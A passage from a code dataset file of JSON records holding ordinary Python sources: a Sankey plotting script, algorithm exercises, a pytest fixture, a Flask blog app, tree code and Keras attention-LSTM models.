数据区名称,ORG_NM,SUB_ORG_0,SUB_ORG_1,SUB_ORG_2,SUB_ORG_3,CountQuery \\\n from cmb_datalab_20200409_sankey;\")\n\nfig = genSankey(rst, cat_cols=[['数据区类型'],['数据区名称'],['ORG_NM'], ['SUB_ORG_0'], ['SUB_ORG_1'], ['SUB_ORG_2'], ['SUB_ORG_3']],\n value_cols='CountQuery', title='Sankey Diagram-CMB_EDW全行用户查询量分布图(数据时间:2020.04.09)')\nplotly.offline.plot(fig, filename='overview.html', validate=False)\n\n# Sankey 2 for IT users\nrst = sql_icld_cols(\"select 数据区类型, 数据区名称,ORG_NM,SUB_ORG_0,SUB_ORG_1,SUB_ORG_2,SUB_ORG_3,CountQuery \\\n from cmb_datalab_20200409_sankey where ORG_NM = '信息技术部';\")\n\nfig = genSankey(rst, cat_cols=[['数据区类型'],['数据区名称'], ['SUB_ORG_1'], ['SUB_ORG_2'], ['SUB_ORG_3']],\n value_cols='CountQuery', title='Sankey Diagram-CMB_EDW信息技术部用户查询量分布图(数据时间:2020.04.09)')\nplotly.offline.plot(fig, filename='it_dep.html', validate=False)\n\n# Sankey 3 for Business users\nrst = sql_icld_cols(\"select 数据区类型, 数据区名称,ORG_NM,SUB_ORG_0,SUB_ORG_1,SUB_ORG_2,SUB_ORG_3,CountQuery \\\n from cmb_datalab_20200409_sankey where ORG_NM <> '信息技术部';\")\n\nfig = genSankey(rst, cat_cols=[['数据区类型'],['数据区名称'],['ORG_NM'], ['SUB_ORG_0'], ['SUB_ORG_1'], ['SUB_ORG_2'],\n ['SUB_ORG_3']], value_cols='CountQuery',\n title='Sankey Diagram-CMB_EDW全行业务用户查询量分布图(数据时间:2020.04.09)')\nplotly.offline.plot(fig, filename='b_dep.html', validate=False)\n","repo_name":"LZatTD/sankey","sub_path":"cmb_datalab_sankey.py","file_name":"cmb_datalab_sankey.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11962453047","text":"import sys\n\nsys.stdin = open('input.txt')\n\nN = int(input())\n\ndef push_back(b, num):\n b.append(num)\n\ndef push_front(b, num):\n b.insert(0,num)\n\ndef pop_back(b):\n if len(b) == 0:\n return -1\n else:\n c = b.pop()\n return c\n\ndef pop_front(b):\n if len(b) == 0:\n return -1\n else:\n c = b.pop(0)\n return c\n\n\ndef size(b):\n return len(b)\n\ndef empty(b):\n if len(b) == 0:\n return 1\n else:\n return 0\n\ndef front(b):\n if len(b) == 0:\n return -1\n else:\n return b[0]\n\ndef back(b):\n if len(b) == 0:\n return -1\n else:\n return b[-1]\n\n\na = []\nfor _ in range(N):\n temp = list(map(str, sys.stdin.readline().split()))\n if len(temp) == 2:\n order, M = temp[0], temp[1]\n M = int(M)\n else:\n order = temp[0]\n\n\n if order == 'push_front':\n push_front(a, M)\n elif order == 'push_back':\n push_back(a, M)\n elif order == 'pop_front':\n print(pop_front(a))\n elif order == 'pop_back':\n print(pop_back(a))\n elif order == 'size':\n print(size(a))\n elif order == 'empty':\n print(empty(a))\n elif order == 'front':\n print(front(a))\n else:\n print(back(a))","repo_name":"sw200662/Algorithm_my","sub_path":"2112/1208/10866.py","file_name":"10866.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13683846048","text":"print(\" Welcome! 
You can create your own chess board with me!\")\r\n\r\nrow=int(input(\"Enter the number of rows: \"))\r\ncolumn=int(input(\"Enter the number of columns: \"))\r\n\r\ndef Chess_board(row,column):\r\n    \r\n    for i in range(row):\r\n        for j in range(column):\r\n            if (i+j)%2==0 :\r\n                print(\"#\",end=\"\")\r\n            else:\r\n                print(\"*\",end=\"\")\r\n        print()\r\n\r\nChess_board(row,column)\r\n","repo_name":"ElahahAria/Session5","sub_path":"seesion5-chess.py","file_name":"seesion5-chess.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"74252598913","text":"\nimport os\nimport subprocess\nimport time\n\nimport pytest\nimport requests\n\n\nTIMEOUT = 120\n\n\n@pytest.fixture\ndef env():\n    def wait_for_env():\n        start = time.time()\n        while True:\n            try:\n                requests.get('http://localhost:8080/ping')\n                requests.get('http://localhost:8080/api/ping')\n                time.sleep(0.5)\n            except requests.exceptions.ConnectionError:\n                if time.time() - start >= TIMEOUT:\n                    raise ValueError('failed to create env')\n                continue\n            return\n\n    root = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..')\n    subprocess.Popen([os.path.join(root, 'up.sh')])\n    wait_for_env()\n    yield\n    p = subprocess.Popen([os.path.join(root, 'down.sh')])\n    p.wait()\n","repo_name":"leongold/dep-view","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"2329953160","text":"import re\n\nfrom coverage.html import escape\nfrom django.http import HttpResponse\nfrom jinja2 import Environment, PackageLoader\nfrom xml.sax.saxutils import escape\nimport unicodedata\n\nfrom mangrove.form_model.field import field_attributes, SelectField, UniqueIdField, UniqueIdUIField\nfrom mangrove.form_model.form_model import FormModel\nfrom mangrove.form_model.project import Project\n\nenv = Environment(loader=PackageLoader('mangrove.transport.xforms'), trim_blocks=True)\ndate_appearance = {\n    'mm.yyyy': 'month-year',\n    'yyyy': 'year'\n}\n\nfield_xmls = {\n    field_attributes.DATE_FIELD: env.get_template(name='date_field.xml', globals={'date_appearance': date_appearance}),\n    field_attributes.SELECT_FIELD: env.get_template('select_field.xml'),\n    field_attributes.MULTISELECT_FIELD: env.get_template('select_field.xml'),\n    field_attributes.LOCATION_FIELD: env.get_template('geo_code_field.xml'),\n    field_attributes.UNIQUE_ID_FIELD: env.get_template('unique_id_field.xml'),\n}\n\nfield_types = {\n    field_attributes.LOCATION_FIELD: 'geopoint',\n    field_attributes.TEXT_FIELD: 'string',\n    field_attributes.INTEGER_FIELD: 'decimal',\n    field_attributes.UNIQUE_ID_FIELD: 'select1',\n    field_attributes.SELECT_ONE_EXTERNAL_FIELD: 'string'\n}\n\n\ndef list_all_forms(form_tuples, xform_base_url):\n    template = env.get_template('form_list.xml')\n    form_tuples = [(escape(form_name), form_id, has_external_itemset) for form_name, form_id, has_external_itemset in form_tuples]\n    return template.render(form_tuples=form_tuples, xform_base_url=xform_base_url)\n\n\ndef xform_for(dbm, form_id, reporter_id):\n    questionnaire = FormModel.get(dbm, form_id)\n\n    xform = questionnaire.xform\n    if xform:\n        xform_cleaned = re.sub(r\"\\s+\", \" \", re.sub(r\"\\n\", \"\", questionnaire.xform_with_unique_ids_substituted()))\n        questionnaire.name = escape(questionnaire.name)\n        #so that in the smartphone repeat questions have at least one group pre added\n        xform_cleaned = 
re.sub(r\".*\", r\"\"+ questionnaire.name +\"\", xform_cleaned)\n xform_cleaned = re.sub(r\"\", r\"\"+ questionnaire.name +\"\", xform_cleaned)\n return re.sub('ns2:template=\"\"', \"\", xform_cleaned)\n\n _escape_special_characters(questionnaire)\n ui_fields = []\n for field in questionnaire.fields:\n if isinstance(field, UniqueIdField):\n ui_fields.append(UniqueIdUIField(field,dbm))\n else:\n ui_fields.append(field)\n template = env.get_template('reporter_entity_form.xml')\n return template.render(questionnaire=questionnaire, fields=ui_fields, field_xmls=field_xmls, reporter_id=reporter_id,\n field_types=field_types, default_template=env.get_template('text_field.xml'))\n\n\ndef itemset_for(dbm, form_id):\n questionnaire = FormModel.get(dbm, form_id)\n\n xform = questionnaire.xform\n project = Project.from_form_model(questionnaire)\n if xform:\n try:\n csv, file_extension = project.has_external_itemset()[1:]\n\n response = HttpResponse(mimetype=\"text/csv\", content=csv)\n response['Content-Disposition'] = 'attachment; filename=\"%s.%s\"' % ('itemsets', file_extension)\n\n except LookupError:\n response = HttpResponse(status=404)\n\n return response\n\ndef _escape_special_characters(questionnaire):\n questionnaire.name = escape(questionnaire.name)\n for question in questionnaire.fields:\n question.set_label(escape(question.label))\n question.set_instruction(escape(question.instruction))\n if type(question) == SelectField:\n question.escape_option_text()\n","repo_name":"mangroveorg/mangrove","sub_path":"mangrove/transport/xforms/xform.py","file_name":"xform.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"29807539205","text":"import argparse\nimport AVL\nimport BST\n\nBSTtestTree = BST.binary_search_tree()\nAVLtestTree = AVL.AVLTree()\n\ndef readFile(fileName):\n countA = 0\n countB = 0\n\n try:\n fileObject = open(fileName, \"r\")\n\n for line in fileObject:\n line = line.lower()\n countA = BSTtestTree.insert(line)\n countB = AVLtestTree.insert(line)\n\n print(\"THIS IS BST\")\n BSTtestTree.height()\n print(\"Total Duplicates: \", BSTtestTree._getDups())\n\n print(\"Total Inserted: \", countA)\n\n print(\"THIS IS AVL\")\n print(\"Height of AVL tree is: \" , AVLtestTree.height())\n print(\"Total Duplicates: \", AVLtestTree._getDups())\n\n print(\"Total Inserted: \", countB)\n\n except IOError:\n print(\"Error opening file\")\n\ndef delVal(fileName2):\n try:\n fileObject = open(fileName2, \"r\")\n\n for line in fileObject:\n line = line.lower()\n AVLtestTree.delete_value(line)\n\n print(\"Deletes: \", AVLtestTree._getDel())\n except IOError:\n print(\"Error opening file\")\n\n# get input\ndef main():\n running = True\n while running:\n try:\n parser = argparse.ArgumentParser()\n parser.add_argument('exp', help = \"Enter expression\")\n parser.add_argument('exp2', help=\"Enter expression\")\n fileName = parser.parse_args()\n fileName2= parser.parse_args()\n except SystemExit:\n print(\"No input found\")\n else:\n readFile(fileName.exp)\n delVal(fileName2.exp2)\n running = False\n\n\n\n\nmain()\n","repo_name":"mheim6/AVL-and-BST","sub_path":"Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71571737475","text":"from flask import Flask, request, render_template, redirect, flash\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import db, 
connect_db, User, Post, Tag\nfrom helper import query_all, query_by_id\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///blogly'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\n\napp.config['SECRET_KEY'] = 'secret-goes-here'\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\ndebug = DebugToolbarExtension(app)\n\nconnect_db(app)\ndb.create_all()\n\n@app.route('/')\ndef users_page_redirect():\n return redirect('/users')\n\n@app.route('/users')\ndef show_users():\n users = query_all(User)\n return render_template('/list.html', users=users)\n\n@app.route('/users/')\ndef show_user_details(user_id):\n user = query_by_id(User, user_id)\n return render_template('/user/details.html', user=user)\n\n@app.route('/users/new')\ndef show_new_user_form():\n return render_template('/user/new.html')\n\n@app.route('/users/new', methods=['POST'])\ndef submit_new_user():\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n image_url = request.form['image_url']\n\n user = User(first_name=first_name, last_name=last_name, image_url=image_url)\n flash('User created!')\n\n db.session.add(user)\n db.session.commit()\n return redirect(f'/users/{user.id}')\n\n@app.route('/users//edit')\ndef edit_user_form(user_id):\n user = query_by_id(User, user_id)\n return render_template('/user/edit.html', user=user)\n\n@app.route('/users//edit', methods=['POST'])\ndef submit_edited_user(user_id):\n user = query_by_id(User, user_id)\n\n user.first_name = request.form['first_name']\n user.last_name = request.form['last_name']\n user.image_url = request.form['image_url']\n\n flash(f'{user.first_name} {user.last_name} updated!')\n db.session.commit()\n\n return redirect('/users')\n\n@app.route('/users//delete', methods=['POST'])\ndef delete_user(user_id):\n user = query_by_id(User, user_id)\n db.session.delete(user)\n db.session.commit()\n\n flash(f'{user.first_name} {user.last_name} deleted')\n \n return redirect('/users')\n\n# posts\n\n@app.route('/posts/')\ndef show_post_details(post_id):\n post = query_by_id(Post, post_id)\n return render_template('/post/details.html', post=post)\n\n@app.route('/users//posts/new')\ndef show_new_post_form(user_id):\n user = query_by_id(User, user_id)\n tags = query_all(Tag)\n\n return render_template('/post/new.html', user=user, tags=tags)\n\n@app.route('/users//posts/new', methods=['POST'])\ndef submit_new_post(user_id):\n user = query_by_id(User, user_id)\n \n title = request.form['title']\n content = request.form['content']\n\n post = Post(title=title, content=content, user=user)\n flash('Post created!')\n\n db.session.add(post)\n db.session.commit()\n\n return redirect(f'/users/{user_id}')\n\n@app.route('/posts//edit')\ndef edit_post_form(post_id):\n post = query_by_id(Post, post_id)\n tags = query_all(Tag)\n return render_template('/post/edit.html', post=post, tags=tags)\n\n@app.route('/posts//edit', methods=['POST'])\ndef submit_edited_post(post_id):\n post = query_by_id(Post, post_id)\n\n post.title = request.form['title']\n post.content = request.form['content']\n \n tag_ids = [int(num) for num in request.form.getlist('tag')]\n post.tags = Tag.query.filter(Tag.id.in_(tag_ids)).all()\n\n flash('Post Updated!')\n\n db.session.commit()\n\n return redirect(f'/users/{post.user_id}')\n\n@app.route('/posts//delete', methods=['POST'])\ndef delete_post(post_id):\n post = query_by_id(Post, post_id)\n \n db.session.delete(post)\n db.session.commit()\n\n flash('Post deleted')\n\n return 
redirect(f'/users/{post.user_id}')\n\n# Tags \n\n@app.route('/tags')\ndef show_tags():\n all_tags = query_all(Tag)\n return render_template('tag/list.html', tags=all_tags)\n\n@app.route('/tags/')\ndef show_tag_details(tag_id):\n tag = query_by_id(Tag, tag_id)\n return render_template('tag/details.html', tag=tag)\n\n@app.route('/tags/new')\ndef show_new_tag_form():\n return render_template('tag/new.html')\n\n@app.route('/tags/new', methods=['POST'])\ndef submit_new_tag():\n name = request.form['name']\n tag = Tag(name=name)\n\n flash('Tag created!')\n\n db.session.add(tag)\n db.session.commit()\n return redirect('/tags')\n\n@app.route('/tags//edit')\ndef edit_tag_form(tag_id):\n tag = query_by_id(Tag, tag_id)\n return render_template('tag/edit.html', tag=tag)\n\n@app.route('/tags//edit', methods=['POST'])\ndef submit_edited_tag(tag_id):\n tag = query_by_id(Tag, tag_id)\n tag.name = request.form['name']\n\n flash('Tag updated!')\n\n db.session.commit()\n\n return redirect(f'/tags/{tag.id}')\n\n@app.route('/tags//delete', methods=['POST'])\ndef delete_tag(tag_id):\n tag = query_by_id(Tag, tag_id)\n\n db.session.delete(tag)\n db.session.commit()\n\n flash('Tag deleted')\n\n return redirect('/tags')","repo_name":"andidietz/blogly_part_three","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38484021158","text":"from abc import ABC, abstractmethod\nfrom pydraw import resize, clear, circle\n\nclass Drawable(ABC):\n @abstractmethod\n def draw(self, x, y): pass\n\nclass Canvas: \n width = 400\n height = 400\n bgcolor = 'white'\n\n @classmethod\n def initialize(cls, width, height, bgcolor):\n cls.width = width\n cls.height = height\n cls. bgcolor = bgcolor\n resize(cls.width, cls.height)\n clear(cls.bgcolor)\n\n @classmethod\n def draw_object(cls, x, y, obj: Drawable):\n obj.draw(x, y)\n\nclass Circle(Drawable):\n def __init__(self, radius, color):\n self.radius = radius\n self.color = color\n def draw(self, x, y):\n circle(x, y, self.radius, self.color)\n\nclass Smiley(Drawable):\n def __init__(self, size):\n self.size = size\n def draw(self, x, y):\n circle(x, y, self.size / 2, 'yellow', True)\n circle(x - self.size / 4, y, self.size / 10, 'black', True)\n circle(x + self.size / 4, y, self.size / 10, 'black', True)\n\nif __name__ == '__main__':\n Canvas.initialize(400, 400, 'white')\n Canvas.draw_object(0, 0, Circle(100, 'black'))\n Canvas.draw_object(-200, -200, Circle(100, 'black'))\n Canvas.draw_object(100, -100, Circle(100, 'blue'))\n Canvas.draw_object(200, -200, Smiley(100))","repo_name":"abuamar142/semester3","sub_path":"pemrograman_berorientasi_objek/pydraw/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41773568355","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 26 00:27:02 2018\r\n\r\n@author: Wenchang Chen\r\n\"\"\"\r\n\r\ndef subsets(nums):\r\n if len(nums) == 1:\r\n return [[],[nums[0]]]\r\n else:\r\n tmp = nums.pop(0)\r\n res = subsets(nums)\r\n return [[tmp] + x for x in res] + res","repo_name":"chenwenchang/Leetcode","sub_path":"78. Subsets.py","file_name":"78. 
Subsets.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70204273155","text":"from collections import Counter\nclass Solution:\n def sumOfUnique(self, nums: list[int]) -> int:\n c= Counter(nums)\n ans=0\n for i,val in c.items():\n if val==1:\n ans+=i\n return ans\na= Solution()\na.sumOfUnique([1,2,3,4,5])","repo_name":"z369437558/Leetcode","sub_path":"1748.py","file_name":"1748.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72640985795","text":"import numpy as np\nimport tensorflow as tf\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.layers import LSTM,RepeatVector,Dense,Activation,Add,Reshape,Input,Lambda,Multiply,Concatenate,Dot,Permute, Softmax,SimpleRNN,AveragePooling1D\nimport keras.backend as K\nlatent_dim = 64\n\ndef RNN(lookback = 6, predstep = 3, input_dim = 1, latent_dim = latent_dim):\n #RNN\n #input shape [batch_size, timestep, input_dim]\n #output shape [batch_size, prestep, output_dim] #output_dim is 1 by default\n rnn_inputs = Input(shape=(None, input_dim),name = 'rnn_input') \n rnn = SimpleRNN(latent_dim, name = 'RNN')\n rnn_r1 = rnn(rnn_inputs)\n rnn_outputs = RepeatVector(1)(rnn_r1)\n rnn_outputs = Dense(1)(rnn_outputs)\n rnn_model = Model(rnn_inputs, rnn_outputs)\n return rnn_model\n\ndef lstm(lookback = 6, predstep = 3, input_dim = 1, latent_dim = latent_dim):\n #LSTM\n #input shape [batch_size, timestep, input_dim]\n #output shape [batch_size, prestep, output_dim] #output_dim is 1 by default\n lstm_inputs = Input(shape=(None, input_dim),name = 'lstm_input') \n lstm = LSTM(latent_dim, name = 'lstm')\n lstm_r1 = lstm(lstm_inputs)\n lstm_outputs = RepeatVector(1)(lstm_r1)\n lstm_outputs = Dense(1)(lstm_outputs)\n lstm_model = Model(lstm_inputs, lstm_outputs)\n return lstm_model\n\ndef seq2seq(lookback = 6, input_dim = 1, latent_dim = latent_dim):\n encoder_inputs = Input(shape = (lookback, input_dim), name = 'encoder_input')\n encoder = LSTM(latent_dim, return_state = True, name = 'encoder_lstm')\n encoder_outputs, state_h, state_c = encoder(encoder_inputs)\n encoder_states = [state_h, state_c]\n \n decoder_inputs = Input(shape = (None, 1), name = 'decoder_input')\n decoder_lstm = LSTM(latent_dim, return_sequences = True, return_state = True, name = 'decoder_lstm')\n decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state = encoder_states)\n\n decoder_dense = Dense(1, name='output_dense')\n decoder_outputs = decoder_dense(decoder_outputs)\n \n #model for training\n model = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n \n #encoder \n #intput: endoer_inputs\n #output: encoder_states\n encoder_model = Model(encoder_inputs, encoder_states)\n \n #decoder for decode sequences\n #input: decoder_input, decoder_states_inputs\n #output: decoder_outputs, states\n decoder_state_input_h = Input(shape = (latent_dim,), name = 'decoder_ini_state_h')\n decoder_state_input_c = Input(shape = (latent_dim,), name = 'decoder_ini_state_c')\n decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\n\n decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state = decoder_states_inputs)\n decoder_states = [state_h, state_c]\n\n decoder_outputs = decoder_dense(decoder_outputs)\n decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)\n \n return model, 
encoder_model, decoder_model\n\ndef lstm_prediction(test_input, model, pre_step = 1):\n #using lstm model for multi-step prediction\n #test_input: [samples, steps, n]\n #lstm seq\n lstm_i_seq = test_input[0]\n lstm_o_seq = np.zeros((test_input[0].shape[0], pre_step, 1))\n for i in range(pre_step):\n output = model.predict(lstm_i_seq)\n lstm_o_seq[:,i,0] = output[:,0,0]\n #update the target sequence of length 1\n lstm_i_seq[:,0:5,0] = lstm_i_seq[:,1:6,0]\n lstm_i_seq[:,5,0] = output[:,0,0]\n return lstm_o_seq\n \nclass MASTNN(object):\n def __init__(self, T = 6, predT = 1, encoder_latent_dim = 64, decoder_latent_dim = 64, aux_att = True, global_att = True, context_mode = 'att' , neigh_num = 15 , trainmode = False):\n super(MASTNN, self).__init__()\n self.trainmode = trainmode # when trainmode is no, the decoder will use the truth value of prev time step to decode\n self.T = T\n self.predT = predT\n self.encoder_latent_dim = encoder_latent_dim\n self.decoder_latent_dim = decoder_latent_dim\n #lstm for encoder and decoder \n self.enLSTM = LSTM(encoder_latent_dim, return_state = True, name = 'encoder_lstm')\n self.deLSTM = LSTM(decoder_latent_dim, return_state = True, name = 'decoder_lstm')\n #encoder auxiliary attention parameter weight matrix\n self.aux_att = aux_att\n self.We = Dense(units = T, input_dim = 2 * encoder_latent_dim, activation = 'linear', use_bias = False, name = 'We')\n self.Ue = Dense(units = T, input_dim = T, activation = 'linear', use_bias = False, name = 'Ue')\n self.Ve = Dense(units = 1, input_dim = T, activation = 'linear', use_bias = False, name = 'Ve')\n #encooder global attention parameter weight matrix\n self.global_att = global_att\n self.neigh_num = neigh_num\n self.lamb = 1\n print('lambda:',self.lamb)\n self.Wg = Dense(units = T, input_dim = 2 * encoder_latent_dim, activation = 'linear', use_bias = False, name = 'Wg')\n self.Ug = Dense(units = T, input_dim = T, activation = 'linear', use_bias = False, name = 'Ug')\n self.Vg = Dense(units = 1, input_dim = T, activation = 'linear', use_bias = False, name = 'Vg')\n #decoder attention parameter weight matrix\n self.context_mode = context_mode\n self.Wd = Dense(units = decoder_latent_dim, input_dim = decoder_latent_dim, activation = 'linear', use_bias = False, name = 'Wd')\n self.Wd_ = Dense(units = decoder_latent_dim, input_dim = 2*encoder_latent_dim, activation = 'linear', use_bias = False, name = 'Wd_')\n self.Vd = Dense(units = 1, input_dim = decoder_latent_dim, activation = 'linear', use_bias = False, name = 'Vd')\n #output parameter matrix\n self.Wo = Dense(units = 1, activation = 'sigmoid', use_bias = True, name = 'Dense2_for_output')\n \n def encoder_attention(self,encoder_inputs, enc_attn, init_states):\n # input : encoder_inputs [batch_size, time_steps, input_dim], \n # enc_attn :attentin weight for the first timestep (ones matrix by default)\n # init_states: initial states for encoder (zeros matrix by default)\n # return : encoder_output, encoder_state, encoder_att\n [h,s] = init_states\n encoder_att = []\n encoder_output = []\n global_att = self.global_att\n aux_att = self.aux_att\n #get input\n if global_att:\n local_inputs = encoder_inputs[0]\n global_inputs = encoder_inputs[1]\n else:\n local_inputs = encoder_inputs\n \n #get att states\n if global_att:\n local_attn = enc_attn[0]\n global_attn = enc_attn[1]\n else:\n local_attn = enc_attn\n \n #local attention\n #shared layer\n AddLayer = Add(name = 'add')\n PermuteLayer = Permute(dims = (2,1))\n ActTanh = Activation(activation = 'tanh',name 
='tanh_for_e')\n ActSoftmax = Activation(activation = 'softmax', name ='softmax_for_alpha')\n def local_attention(states,step):\n #for attention query\n #linear map\n Ux = self.Ue(PermuteLayer(local_inputs)) #[none,input_dim,T]\n states = Concatenate(axis = 1, name = 'state_{}'.format(step))(states)\n Whs = self.We(states) #[none, T]\n Whs = RepeatVector(local_inputs.shape[2])(Whs) #[none,input_dim,T]\n y = AddLayer([Ux, Whs])\n e = self.Ve(ActTanh(y)) #[none,input_dim,1]\n e = PermuteLayer(e) #[none,1,input_dim]\n alpha = ActSoftmax(e)\n return alpha\n \n AddLayer2 = Add(name = 'add2')\n PermuteLayer2 = Permute(dims = (2,1))\n ActTanh2 = Activation(activation = 'tanh',name ='tanh_for_e2')\n ActSoftmax2 = Activation(activation = 'softmax', name ='softmax_for_beta')\n \n def global_attention(states, step, prior):\n #for global attention query\n #global inputs[0](values) [none, T, neighbornum]\n #linear map Wg\n states = Concatenate(axis = 1, name = 'state_gl_{}'.format(step))(states)\n Wgs = self.Wg(states) #[none,T]\n Ugy = self.Ug(PermuteLayer2(global_inputs[0])) # [none, neighbornum, T]\n Wgs_ = RepeatVector(global_inputs[0].shape[2])(Wgs) # [none, neighbornum, T]\n y2 = AddLayer2([Wgs_,Ugy])\n g = self.Vg(ActTanh2(y2))\n g = PermuteLayer2(g)\n g_ = Lambda(lambda x: (1-self.lamb)*x + self.lamb*prior)(g)\n beta = ActSoftmax2(g)\n return beta\n \n for t in range(self.T):\n if global_att:\n if aux_att:\n x = Lambda(lambda x: x[:,t ,:], name = 'X_local_{}'.format(t))(local_inputs) #[none,input_dim]\n x = RepeatVector(1)(x) #[none,1,input_dim] , 1 denotes one time step\n [global_input_value,global_input_weight] = global_inputs\n x2 = Lambda(lambda x2: x2[:,t ,:], name = 'X_global_{}'.format(t))(global_input_value) #[none,neighbornum]\n x2 = RepeatVector(1)(x2) #[none,1,neighbornum] , 1 denotes one time step\n prior = Lambda(lambda p: p[:,t ,:], name = 'global_prior_{}'.format(t))(global_input_weight) #[none,neighbornum]\n prior = RepeatVector(1)(prior)\n local_x = Multiply(name = 'Xatt_local_{}'.format(t))([local_attn, x]) #[none,1,input_dim]\n print('global_attn:',global_attn, 'x2:',x2)\n global_x = Dot(axes = (2),name = 'Xatt_global_{}'.format(t))([global_attn, x2])\n #global_x = Multiply(name = 'Xatt_global_{}'.format(t))([global_attn, x2])\n att_x = Concatenate(axis = -1)([local_x, global_x])\n o, h, s = self.enLSTM(att_x, initial_state = [h, s]) #o, h, s [none, hidden_dim]\n o = RepeatVector(1)(o)\n encoder_output.append(o)\n local_attn = local_attention([h,s], t+1)\n global_attn = global_attention([h,s],t+1, prior)\n encoder_att.append([local_attn, global_attn])\n elif not aux_att:\n x = Lambda(lambda x: x[:,t ,:], name = 'X_local_{}'.format(t))(local_inputs) #[none,input_dim]\n x = RepeatVector(1)(x) #[none,1,input_dim] , 1 denotes one time step\n [global_input_value,global_input_weight] = global_inputs\n x2 = Lambda(lambda x2: x2[:,t ,:], name = 'X_global_{}'.format(t))(global_input_value) #[none,neighbornum]\n x2 = RepeatVector(1)(x2) #[none,1,neighbornum] , 1 denotes one time step\n prior = Lambda(lambda p: p[:,t ,:], name = 'global_prior_{}'.format(t))(global_input_weight) #[none,neighbornum]\n prior = RepeatVector(1)(prior)\n #global_x = Multiply(name = 'Xatt_global_{}'.format(t))([global_attn, x2])\n global_x = Dot(axes = (2),name = 'Xatt_global_{}'.format(t))([global_attn, x2])\n att_x = Concatenate(axis = -1)([x, global_x])\n o, h, s = self.enLSTM(att_x, initial_state = [h, s]) #o, h, s [none, hidden_dim]\n o = RepeatVector(1)(o)\n encoder_output.append(o)\n global_attn = 
global_attention([h,s],t+1, prior)\n encoder_att.append(global_attn)\n \n elif not global_att:\n if aux_att:\n x = Lambda(lambda x: x[:,t ,:], name = 'X_{}'.format(t))(local_inputs) #[none,input_dim]\n x = RepeatVector(1)(x) #[none,1,input_dim] , 1 denotes one time step\n local_x = Multiply(name = 'Xatt_{}'.format(t))([local_attn, x]) #[none,1,input_dim]\n o, h, s = self.enLSTM(local_x, initial_state = [h, s]) #o, h, s [none, hidden_dim]\n o = RepeatVector(1)(o)\n encoder_output.append(o)\n local_attn = local_attention([h,s], t+1)\n encoder_att.append(local_attn)\n elif not aux_att:\n x = Lambda(lambda x: x[:,t ,:], name = 'X_{}'.format(t))(local_inputs) #[none,input_dim]\n x = RepeatVector(1)(x) #[none,1,input_dim] , 1 denotes one time step\n o, h, s = self.enLSTM(x, initial_state = [h, s]) #o, h, s [none, hidden_dim]\n o = RepeatVector(1)(o)\n encoder_output.append(o)\n\n if global_att and aux_att:\n local_att = [i[0] for i in encoder_att]\n print('local_att', local_att)\n local_att = Concatenate(axis = 1)(local_att)\n global_att = [i[1] for i in encoder_att]\n print('global_att', global_att)\n #global_att = Concatenate(axis = 1)(global_att)\n global_att = Lambda(lambda x: K.concatenate(x, axis = 1))(global_att)\n encoder_att = [local_att, global_att]\n #elif global_att:\n # encoder_att = Concatenate(axis = 1,name = 'encoder_att')(encoder_att) #[none, T, input_dim]\n \n encoder_output = Concatenate(axis = 1, name = 'encoder_output')(encoder_output)\n \n return encoder_output, [h,s], encoder_att\n \n def decoder_attention(self, decoder_inputs,initial_state,attention_states):\n #input : decoder_inputs, intial_state, attention_states\n #return : output, state\n \n #get input\n last_inputs = decoder_inputs\n \n AddLayer = Add(name = 'add_tem')\n PermuteLayer = Permute(dims = (2,1))\n ActTanh = Activation(activation = 'tanh',name ='tanh_for_d')\n def attention(states, step):\n #return context for the t step\n Wh = self.Wd(attention_states) #[none, T, latent_dim]\n states = Concatenate(axis = 1, name = 'state_hat_{}'.format(step))(states)\n Wds = self.Wd_(states) #[none, latent_dim]\n Wds = RepeatVector(attention_states.shape[1])(Wds) #[none, T, latent_dim]\n y = AddLayer([Wds,Wh])\n u = self.Vd(ActTanh(y))#[none, T, 1]\n a = Softmax(axis = 1)(u)\n c = Dot(axes = (1))([a,attention_states]) #[none, 1, latent_dim], the summed context over encoder outputs at certain pred time step \n return c \n \n def meancontext():\n c = AveragePooling1D(pool_size = (attention_states.shape[1],))(attention_states)\n return c\n \n def lastcontext():\n c = Lambda(lambda x: x[:,-1,:], name = 'lastouput')(attention_states)\n c = 